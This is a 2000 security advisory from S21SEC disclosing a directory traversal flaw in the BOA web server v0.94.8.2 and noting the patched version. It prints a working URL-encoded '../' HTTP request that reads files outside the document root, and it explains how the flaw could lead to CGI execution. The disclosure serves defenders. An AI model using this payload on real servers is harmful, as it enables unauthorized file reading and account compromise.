boa.server.txt

`###############################################################  
ID: S21SEC-005-en  
Title: Vulnerability in BOA web server v0.94.8.2  
Date: 03/10/2000  
Status: Vendor contacted, patch available  
Scope: Arbitrary file access  
Platforms: Unix  
Author: llmora  
Location: http://www.s21sec.com/en/avisos/s21sec-005-en.txt  
Release: Public  
###############################################################  
  
S 2 1 S E C  
  
http://www.s21sec.com  
  
Vulnerability in BOA web server v0.94.8.2  
  
  
There is a security bug in BOA v0.94.8.2 that allows a malicious  
user to access files outside the document root of the web server  
as the user the server runs as.  
  
About BOA  
---------  
  
Boa is an open source high performance web server for Unix-alike  
computers (http://www.boa.org). It does file serving and dynamic  
content generation via CGI.  
  
Vulnerability description  
-------------------------  
  
- Reading any file in the web server  
  
The boa web server suffers of the well-known "../.." web server  
problem. If we request a document from the web server,  
using the "../.." technique, we get:  
  
homer:~$ telnet ilf 80  
Escape character is '^]'.  
GET /../../../../../../../../../../../etc/motd HTTP/1.0  
  
HTTP/1.0 404 Not Found  
  
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>  
<BODY><H1>404 Not Found</H1>  
The requested URL /etc/motd was not found on this server.  
</BODY></HTML>  
Connection closed by foreign host.  
homer:~$  
  
So apparently it doesn't work, as boa checks for "/.." in the path.  
  
By URL-encoding the "." in the request, we are able to skip the ".." test,  
allowing us to access the contents of any file the user running the  
web server has access to:  
  
homer:~$ telnet ilf 80  
GET  
/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2  
E/etc/motd HTTP/1.0  
  
HTTP/1.0 200 OK  
  
[... the /etc/motd file content is shown]  
  
Connection closed by foreign host.  
homer:~$  
  
If the administrator enables extension based CGI support with a line like  
this in the boa.conf file:  
  
AddType application/x-httpd-cgi cgi  
  
then a request for a file ending in .cgi will result in the file being  
executed with the privileges of the user id running the web server. This  
file can be placed in any folder throughout the file system, not strictly  
under the DocumentRoot, and be accessed using the previous bug, leading  
to the web server account compromise.  
  
Affected versions  
-----------------  
  
This bug has been tested and verified to be present in v0.94.8.2 of the boa  
web server. Version 0.92 of boa is not affected by this problem.  
  
Fix information  
---------------  
  
The boa development team has released v0.94.8.3 which fixes this  
vulnerability.  
Upgrades are available at the vendor website (http://www.boa.org).  
  
S21SEC wishes to thank the boa development team for acknowledging the issue  
and releasing a security patch in a matter of hours.  
  
Additional information  
----------------------  
  
This vulnerability was found and researched by:  
  
Lluis Mora [email protected]  
  
You can find the latest version of this advisory at:  
  
http://www.s21sec.com/en/avisos/s21sec-005-en.txt  
  
And other S21SEC advisories at http://www.s21sec.com/en/avisos/  
  
`